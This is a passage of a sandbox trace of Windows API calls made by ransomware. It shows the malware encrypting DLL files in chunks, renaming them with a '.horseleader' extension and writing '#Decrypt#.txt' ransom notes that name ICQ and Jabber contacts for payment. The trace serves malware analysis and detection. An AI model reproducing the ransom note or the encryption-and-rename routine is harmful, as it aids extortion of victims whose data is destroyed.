shared\\web server extensions\\14\\bin\\fpsrvutl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.848] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL") returned 92 [0250.848] StrStrW (lpFirst="FPSRVUTL.DLL", lpSrch=".txt") returned 0x0 [0250.848] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=2522488) returned 1 [0250.848] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.848] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.851] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.851] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.852] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x1316bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.852] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.856] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.856] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.856] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x262d78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.856] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.859] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.859] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.859] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.859] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.859] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.860] CloseHandle (hObject=0x15c) returned 1 [0250.860] GetProcessHeap () returned 0x780000 [0250.860] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.860] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.horseleader") returned 104 [0250.860] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll.horseleader")) returned 1 [0250.861] GetProcessHeap () returned 0x780000 [0250.861] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.861] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1da56400, ftCreationTime.dwHighDateTime=0x1cb71c7, ftLastAccessTime.dwLowDateTime=0xdb7fce60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1da56400, ftLastWriteTime.dwHighDateTime=0x1cb71c7, nFileSizeHigh=0x0, nFileSizeLow=0x14cd90, dwReserved0=0x63d5bfda, dwReserved1=0x1ff30e1e, cFileName="FPWEC.DLL", cAlternateFileName="")) returned 1 [0250.861] lstrcmpiW (lpString1="FPWEC.DLL", lpString2="Windows") returned -1 [0250.861] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL") returned 89 [0250.861] StrStrIW (lpFirst="FPWEC.DLL", lpSrch=".horseleader") returned 0x0 [0250.861] lstrcmpW (lpString1="FPWEC.DLL", lpString2="#Decrypt#.txt") returned 1 [0250.861] lstrcmpW (lpString1="FPWEC.DLL", lpString2="_uninstalling_.png") returned 1 [0250.862] lstrlenW (lpString=".testttjffg") returned 11 [0250.862] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL", lpSrch=".testttjffg") returned 0x0 [0250.862] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.862] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.862] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpwec.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.863] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL") returned 89 [0250.863] StrStrW (lpFirst="FPWEC.DLL", lpSrch=".txt") returned 0x0 [0250.863] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1363344) returned 1 [0250.863] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.863] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.866] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.866] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.867] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xa3ec8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.868] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.884] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.884] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.885] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x147d90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.885] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.887] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.888] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.888] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.888] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.888] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.888] CloseHandle (hObject=0x15c) returned 1 [0250.889] GetProcessHeap () returned 0x780000 [0250.889] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.889] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL.horseleader") returned 101 [0250.889] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpwec.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpwec.dll.horseleader")) returned 1 [0250.890] GetProcessHeap () returned 0x780000 [0250.890] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.891] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1da56400, ftCreationTime.dwHighDateTime=0x1cb71c7, ftLastAccessTime.dwLowDateTime=0xdb7fce60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1da56400, ftLastWriteTime.dwHighDateTime=0x1cb71c7, nFileSizeHigh=0x0, nFileSizeLow=0x14cd90, dwReserved0=0x63d5bfda, dwReserved1=0x1ff30e1e, cFileName="FPWEC.DLL", cAlternateFileName="")) returned 0 [0250.891] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0250.891] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\#Decrypt#.txt") returned 93 [0250.891] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.894] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.894] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0250.896] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.896] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0250.896] CloseHandle (hObject=0x1a4) returned 1 [0250.896] GetProcessHeap () returned 0x780000 [0250.896] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.896] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="BIN", cAlternateFileName="")) returned 0 [0250.896] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0250.897] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\#Decrypt#.txt") returned 89 [0250.898] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.898] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.898] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0250.900] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.900] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0250.900] CloseHandle (hObject=0x158) returned 1 [0250.900] GetProcessHeap () returned 0x780000 [0250.900] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.900] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="14", cAlternateFileName="")) returned 0 [0250.900] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.901] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\#Decrypt#.txt") returned 86 [0250.901] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.901] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.901] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.903] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6X